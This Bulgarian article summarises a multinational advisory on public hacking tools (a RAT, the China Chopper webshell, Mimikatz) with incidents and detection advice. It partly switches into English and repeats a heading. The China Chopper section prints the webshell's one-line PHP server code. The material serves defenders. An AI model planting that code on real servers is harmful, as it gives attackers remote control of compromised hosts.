US-CERT издаде доклад с описание на основни публично достъпни инструменти за кибернашествия

Докладът съдържа съвместно изследване от институциите за киберсигурност на пет държави: Австралия, Канада, Нова зенландия, UK и USA. [1][2][3][4][5]

Съдържанието му представя пет публично достъпни инструменти за кибернашествия, които се използват за зловредни действие при кибер инциденти в последните години:

  1. Remote Access Trojan: JBiFrost
  2. Webshell: China Chopper
  3. Credential Stealer: Mimikatz
  4. Lateral Movement Framework: PowerShell Empire
  5. C2 Obfuscation and Exfiltration: HUC Packet Transmitter

Целта на доклада е да подпомогне работата на екипите, които конструират защитата на мрежите и информационните системи. Предоставя и съвети за ограничаване на ефективността на тези Публично достъпни инструменти за кибернашествия и откриване на тяхното присъствие в мрежите.

Инструментите, които са анализирани в този доклад, са много малка част от огромния парк с различни други инструменти, използвани от злонамерените актьори на заплахите.

Тази уговорка е важна, за да не смятат засегнатите от подобни рискове, че с този списък се изчерпват планираните мерки за защитата на мрежата.

Публично достъпни инструменти за кибернашествия и техниките, които са предназначени за експлоатиране на мрежите и данните, които се съхраняват в тях, днес са достъпни за всички, които имат умението да си копират няколко файла от интернет и да боравят с тях в ролята на хакери. Независимо дали придобилите тези инструменти са представители на институции или престъпници, те могат да изпълзват пълната им функционалност без да притежават изключителни занания, умения и компетенции, каквито са имали хакерите създатели на тези инструменти. Предварителната подготовка за боравене с тези инструменти днес е тази, с която разполагат редовите потребители от цифровия свят.

Осигурени с разнообразни функции зловредните Публично достъпни инструменти за кибернашествия може да бъдат използвани от всички

  • квалифицирани тестери за проникване;
  • враждебни държавни актьори;
  • организирани престъпници;
  • самосиндикални кибер престъпници;
  • любители хакери.

Инструментите, които са анализирани в този документ, са използвани за компрометиране на мрежи и информационни системи в широк спектър от критични сектори, включително здравеопазване, финанси, правителство и отбрана. Широкото им разпространение представлява предизвикателство за защитата на мрежите и противопоставянето на актьорите на заплахите.

Какво показва опитът от представяното проучване. То е направено чрез обединие на капацитета на водещи световни икономически и технологични сили на страните участнички.

Въпреки че участниците в кибернетичната заплаха продължават да развиват своите възможности, те все още използват въпросните инструменти и техники.

Дори най-сложните атаки на групи участници в заплахите използват общи, публично достъпни инструменти за постигане на техните цели

Каквито и да са тези цели, първоначалното проникване в системите на жертвите често става чрез използване на общи слабости в сигурността. Злоупотребата с незакърпени софтуерни уязвимости или с лошо конфигурирани системи са често срещани подходи на актьорите на заплахите. Инструментите, описани подробно в този доклад влизат в действие  след като бъде компрометирана мрежата или информационната система. Това позволява на атакуващите да постигнат целите си в системите на жертвата. Целите обикновено с аизточване на лични данни, на корпоративно ноу-хау. По рядко се стига до унищожаване на дданни или цели системи.

Независимо от целите на атакуващите, инициализацията н аатаката най-редовно става през добре познати и известни уязвимости в операционните системи, машините за обработване на бази данни, мрежовите устройства и приложенията.

Как се използва доклада на US-CERT за Публично достъпни инструменти за кибернашествия

Инструментите, които се обсъждат в доклада попадат в пет различни категории.

Remote Access Trojans (RATs);

webshells;

credential stealers;

lateral movement frameworks;

and command and control (C2) obfuscators.

Представен е преглед на заплахите, които всеки от инструментите предполага. Припомнят се реални инциденти с вътрешни подробности кога, къде и по какъв начин е овеществена заплахата с всеки от инструментите. Дава отговор как да се подходи за откриване на итструмента, след като е инсталиран в компрометирана система и възможностите му за нанасяне на ефективни вреди. Представени са и мерки за повишаване на защитните възможности на мрежите на базата на добри практики.

Технически детайли

Remote Access Trojan: JBiFrost

За първи път е наблюдаван през май 2015 г. JBiFrost RAT е вариант на RAT, който от своя страна произлица или е модификация на Frutas RAT 2012.

RAT е програма, която след като бъде инсталирана на машината на жертвата дава възможност за отдалечено администриране.  Списъкът на услугите, които злосторниците получават след скритото инсталиране на такъв тип програма включва:

отдалечено конфигуриране и преконфигуриране на операционната система и проложенията;

инсталиране, активиране и спиране, както и деинсталиране на програми за

  • записване през микрофона на машината;
  • филмиране през камерата;
  • записване на всички натиснати клавиши – чрез keylogger;
  • копиране на данни;
  • изпращане на снимки на екрана към отдалечени машини или имейл адреси дори.

Зловредните RAT са трудни за откриване. Създателите им са ги направили невидими. Те не излизат в списъка на активните приложения, които се листват когата ги гледаме през Task Manager във Windows или Application Manager в Android..

За да предотвратят откриването си RAT изключват мерките за сигурност в операционните системи.

Начин на употреба

JBiFrost RAT се използва от кибер криминали и други актьори на заплахите, които имат слаба подготовка в областта на хакерството. Възможностите на ези инструменти лесно воже да влязат в работа и на институционално организирани актьори на заплахите.

Други, по-рафинирани RAT се използват за реализиране на постоянно невидимо присъствие (Advanced Persistent Threat, APT)) в мрежите и информационните системи на жертвите. Такива са примерите с:

  • Adwind RAT, използван срещу структури от въздухоплаването и отбраната;
  • Quasar RAT, by APT10, срещу организации от широк спектър от индустриални сектори.

Целта на инструментите за постоянно невидимо присъствие обикновено е постоянно изнасяне на ценна информация, например пълномощия за банкови акаунти, индустриално ноухау или лични данни.

Възможности

JBiFrost RAT е базиран на Java, кросплатформен и мултифункционален. Заплашва Windows, Linux, MAC OS X и Android.

JBiFrost RAT позволява на актьорите на заплаха да да се придвижват между хостовете като завладяват нови територии от мрежата или да инсталират допълнителен злонамерен софтуер. Той се предава основно чрез:

  • имейли;
  • прикачен файл;
  • обикновено известие за фактура;
  • заявка за котировка;
  • уведомление за превод;
  • уведомление за изпращане;
  • известие за плащане;
  • или с връзка към услуга за хостване на файлове.

Но това още не е всичко

Както се казва в рекламата. След като веднъж завладяната територия е употребена и инфекциите са извлекли интелектуална собственост, банкови данни и лична идентификационна информация (PII) следва втори начин на употреба. Машините, заразени с JBiFrost RAT, могат да се използват и в ботнетите за извършване на разпределени атаки на отказ от обслужване DDoS.

Примери за атаки с Публично достъпни инструменти за кибернашествия

В началото на 2018 се наблюдава нарастване на използването на JBiFrost RAT в атаки срещу организации, които имат за предмет критична национална инфраструктура в САЩ и операторите от техните вериги за доставки.

През 2017, Adwind RAT е инсталиран в широк  спектъп платформи през лъжливи имейли. За целта имейлите са изглеждали създадени и изпратени от Society for Worldwide Interbank Financial Telecommunication, SWIFT, организация, която предлага специализирани мрежови услуги за финансови институции.

Много други версии на различни RAT, включително варианти на Gh0st RAT, са наблюдавани срущу голямо количество цели по света.

Откриване и защита на Публично достъпни инструменти за кибернашествия

Някои от индикациите за наличие на инфекция с JBiFrost RAT:

Невъзможност за рестартиране на компютъра в безопасен режим Safe mode;
Невъзможността за отваряне на редактора на системния регистър на Windows или на диспечера на задачите Task manager;
Значително увеличаване на дисковата активност или мрежовия трафик;
Наблюдават се опити за свързване със злонамерени IP адреси по различни протоколи;
Създаване на нови файлове и директории с мъгливи, странни  случайни имена.
Защитата се осигурява най-добре, като се гарантира, че системите и инсталираните приложения са напълно защитени чрез подходящи конфигурации и актуализирани с ъпдейти по сигурността. Използването на съвременна антивирусна програма с автоматично актуализиране на дефинициите и редовни системни сканирания също ще помогне да се гарантира, че повечето от най-новите варианти на RAT ще бъдат спрени.

За да се предотврати появата на инфекции, се препоръчва стриктно включване на механизма бял списък

Той съдържа имената на приложенията, за които е разрашено да работят в платформата.

Първоначалният механизъм за инфектиране за RAT, включително JBiFrost RAT, може да бъде чрез фишинг имейли. Можете да предотвратите появата на инфекции, причинени от JBiFrost RAT, като престанете да достигате до потребителите си, като помагате на потребителите да идентифицират и докладват имейли за фишинг и да въвеждат контроли за сигурност, така че зловредният имейл да не компрометира вашето устройство. Националният център за кибернетична сигурност в Обединеното кралство (United Kingdom National Cyber Security Centre, UK NCSC) публикува насоки за фишинг.

Webshell: Китайски хеликоптер
Китайски хеликоптер е публично достъпен уебшел. Добре документиран, широко използван от 2012 г. насам.

Webshells са злонамерени скриптове, които се качват в целеви хост след първоначален компромис и предоставят на отдалечен административен капацитет за осъществяване на атака и реализиране на заплаха.

След като този достъп бъде установен, webshells могат да бъдат използвани за овладяване на следващи хостове в рамките на мрежата.

 

Webshell: China Chopper

China Chopper е публично достъпен, добре документиран webshell. Разпространен е широко от 2012 г.

Зловредните софтуерни приложения от типа Webshell се копират чрез непозволени способи в платформата, която е цел на атаката. След този момент хостът е компрометиран. Тогава злонамерения актьор има възможност да упражнява права на администратор върху ресурсите му. Най неприятната вест в този случай е възможността на злонамерените актьори да използват този хост за плацдарм. За да окупират останалите платформи от мрежата, в която са попаднали. От гледна точка на крайния потребител China Chopper е приложение с графичен интерфейс и менюта. Заедно с приличната документация това го прави достъпен дори за неизкушени потребители, камо ли за хакери.

Употреба на Публично достъпни инструменти за кибернашествия

China Chopper се използва интензивно от актьорите на заплахите за отдалечен достъп до овладени компютри с компрометирани уеб сървъри. Така зломишлениците могат да управляват файлове и директории, имат достъп до платформата чрез виртуален терминал.

Големината на China Chopper е само 4 KB и лесно се използва за да пренася товари, трудно се открива поради големината на файла и не е лесен за деактивиране.

Какви може да бъдат товарите? Най често зловредни приложения, които се инсталират с помощта на webshell. Може да са:

  • агенти за причиняване на отказ на услуга;
  • разппространяване на софтуер за добиване на биткоини без знанието на потребителя;
  • приложения за ransomware, които криптират данните и издават съобщение с искане за откуп и много други.
Възможности на China Chopper

В генеричния и този случай webshell се състоят от две части – клиент с графичен интерфейс (caidao.exe) и малко парче код върху компрометирания уеб сървър.

Опасен е защото е труден за откриване

Файлът, който се поставя в копрометирания уеб сървър в някои случаи с PHP е следния.

<?php @eval($_POST[‘password’]);?>

Логиката за функционирането му е делегирана на клиента caidao.exe.

Той комуникира директно с файла, който е поставен в уеб сървъра и доставя множество интересни възможности например:

  • File explorer;
  • DataBase client;
  • interactive command shell;
  • “Security Scan” полезен при брутално тестване за откриване н апароли за досъп до уеб портали.

Хешът на клиента по MD5 е публично достъпен (оригинално публикуван на hxxp://www.maicaidao.com).

Table 1: China Chopper webshell client MD5 hash

Webshell ClientMD5 Hash
caidao.exe5001ef50c7e869253a7c152a638eab8a

Сървърът на webshell (малкото парче код на PHP) се копира в компрометирания уеб сървър. След това може лесно да бъде променян от атакуващия. Това усложнява дефинирането на специфичен хеш, който всеки път да помага в откриването на зловредна активност с този инструент.

През лятото на 2018 г. актьорите на заплахите се насочват към уеб сървъри, които са уязвими за CVE-2017-3066. Активността им е свързана с уязвимост в платформата за разработване на уеб приложения Adobe ColdFusion. Тя дава възможност за отдалечено изпълнение н апрограмен код (remote code execution).

China Chopper е предназначен за второстепенен полезен товар, доставен, след като сървърите вече са били компрометирани.  Позволява на актьора на заплахата отдалечен достъп до хоста на жертвата. След успешното използване на уязвимост на машината на жертвата, стрингът с China Chopper се доставя в директориите на уеб сървъра. След като бъде копиран там, сървърът на WebShell може да бъде достъпен от актьорите на заплахата по всяко време чрез използване на клиентското приложение. След успешното свързване, атакуващият  продължава да манипулира файлове и данни на уеб сървъра, естествено в свой интерес.

Възможностите на China Chopper включват:

  • копиране на файлове от и към жертвата чрез инструмента wget;
  • за копиране на файлове от интернет към целта;
  • редактиране, изтриване, копиране, преименуване и дори промяна на времевите маркери на съществуващи файлове.
Detection and protection

The most powerful defense against a webshell is to avoid the web server being compromised in the first place. Ensure that all the software running on public-facing web servers is up-to-date with security patches applied. Audit custom applications for common web vulnerabilities.[6]

One attribute of China Chopper is that every action generates a hypertext transfer protocol (HTTP) POST. This can be noisy and is easily spotted if investigated by a network defender.

While the China Chopper webshell server upload is plain text, commands issued by the client are Base64 encoded, although this is easily decodable.

The adoption of Transport Layer Security (TLS) by web servers has resulted in web server traffic becoming encrypted, making detection of China Chopper activity using network-based tools more challenging.

The most effective way to detect and mitigate China Chopper is on the host itself—specifically on public-facing web servers. There are simple ways to search for the presence of the web-shell using the command line on both Linux and Windows based operating systems.[7]

To detect webshells more broadly, network defenders should focus on spotting either suspicious process execution on web servers (e.g., Hypertext Preprocessor [PHP] binaries spawning processes) and out-of-pattern outbound network connections from web servers. Typically, web servers make predictable connections to an internal network. Changes in those patterns may indicate the presence of a web shell. You can manage network permissions to prevent web-server processes from writing to directories where PHP can be executed, or from modifying existing files.

We also recommend that you use web access logs as a source of monitoring, such as through traffic analytics. Unexpected pages or changes in traffic patterns can be early indicators.

How to block Webshells

Since webshell exploits are undertaken only on servers with web application vulnerabilities or configuration weaknesses, identification and closure of such vulnerabilities is crucial in avoiding compromise. For servers supporting PHP, potentially dangerous functions such as exec (), shell_exec (), eval (), assert () , etc and should be disabled in php.ini when not in use. This makes it hard to execute the content of a webshell should it be eventually uploaded. Also sensitive directories such as images or upload should also be disabled or name modified from its default state. Web Applications with file upload features should be secured and allow uploads of only whitelisted file types. In case of CMS like WordPress, third-party plugins that are not needed should be disabled.

Why Use Web-shells?

Persistent Remote Access

A web-shell usually contains a backdoor which allows an attacker to remotely access and possibly, control a server at any time. This would save the attacker the inconvenience of having to exploit a vulnerability each time access to the compromised server is required.

An attacker might also choose to fix the vulnerability themselves, in order to ensure that no one else will exploit that vulnerability. This way the attacker can keep a low-profile and avoid any interaction with an administrator, while still obtaining the same result.

It is also worth mentioning that several popular web shells use password authentication and other techniques to ensure that only the attacker uploading the web-shell has access to it. Such techniques include locking down the script to a specific custom HTTP header, specific cookie values, specific IP addresses, or a combination of these techniques. Most web shells also contain code to identify and block search engines from listing the shell and, as a consequence, blacklisting the domain or server the web application is hosted on – in other words, stealth is key.

Privilege Escalation

Unless a server is misconfigured, the web shell will be running under the web server’s user permissions, which are (or, at least, should be) limited. Using a web-shell, an attacker can attempt to perform privilege escalation attacks by exploiting local vulnerabilities on the system in order to assume root privileges, which, in Linux and other UNIX-based operating systems is the ‘super-user’.

With access to the root account, the attacker can essentially do anything on the system including installing software, changing permissions, adding and removing users, stealing passwords, reading emails and more.

Pivoting and Launching Attacks

A web-shell can be used for pivoting inside or outside a network. The attacker might want to monitor (sniff) the network traffic on the system, scan the internal network to discover live hosts, and enumerate firewalls and routers within the network.

This process can take days, even months, predominantly because an attacker typically seeks to keep a low profile, and draw the least amount of attention possible. Once an attacker has persistent access, they can patiently make their moves.

The compromised system can also be used to attack or scan targets that reside outside the network. This adds an additional layer of “anonymity” to the attacker since they are using a 3rd party system to launch an attack. A step further would be to pivot (tunnel) through multiple systems to make it almost impossible to trace an attack back to its source.

Zombie

Another use of web-shells is to make servers part of a botnet. A botnet is a network of compromised systems that an attacker would control, either to use themselves, or to lease to other criminals. The web-shell or backdoor is connected to a command and control (C&C) server from which it can take commands on what instructions to execute.

This setup is commonly used in distributed-denial-of-service (DDoS) attacks, which require expansive amounts of bandwidth. In this case, the attacker does not have any interest in harming, or stealing anything off-of the system upon which the web shell was deployed. Instead, they will simply use its resources for whenever is needed.

Кражба ва потребителски акаунти с Mimikatz

Mimikatz е разработена през 2007 г.. Използва се от зломишлени актьори за събиране на пълномощията (потребителските имена и паролите) на други потребители, които са влезли в целевата машина с Windows. Това става чрез достъп до идентификационните данни в паметта в рамките на процеса на Windows, наречен Local Security Authority Subsystem Service (LSASS).

Тези идентификационни данни, както в обикновен текст, така и в хеширана форма, могат да бъдат използвани отново, за да се осигури достъп до други машини в мрежата.

Въпреки че първоначално не е бил предназначен като хакерски инструмент, през последните години Mimikatz е бил използван от множество актьори за злонамерени цели. Използването му в от хакери за различни атаки по света постави пред организициите в световен мащаб да задача да преосмислят своите мрежови защити.

Mimikatz обикновено се използва от актьорите на заплаха, след като достъпът до хост от вътрешната мрежа е постигнат и нашественикът иска да се движи във вътрешната мрежа. Неговото използване може значително да подкопае лошо конфигурирана мрежова сигурност.

Hits: 8